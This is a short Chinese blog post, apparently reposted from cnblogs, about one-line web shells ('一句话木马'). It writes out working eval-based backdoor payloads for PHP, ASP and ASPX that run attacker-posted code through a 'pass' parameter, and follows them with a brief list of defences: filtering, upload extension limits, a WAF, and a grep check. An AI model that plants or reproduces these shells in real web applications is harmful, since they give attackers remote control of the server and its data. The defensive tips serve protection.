码迷,mamicode.com
首页 > 其他好文 > 详细

一句话木马

时间:2019-08-17 17:48:05      阅读:112      评论:0      收藏:0      [点我收藏+]

标签:eva   script   waf   post   php   pass   ring   vbscript   asp   

php   <?php @eval($_post[‘pass‘]);?>

asp  <%eval request ("pass")%>

aspx  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

防御

  代码中过滤。限制上传文件的后缀名

  waf过滤

  检查是否存在一句话木马。fgrep -R ‘一句话木马代码‘ /var/www/xxx

 

一句话木马

标签:eva   script   waf   post   php   pass   ring   vbscript   asp   

原文地址:https://www.cnblogs.com/jiersixi/p/11369311.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!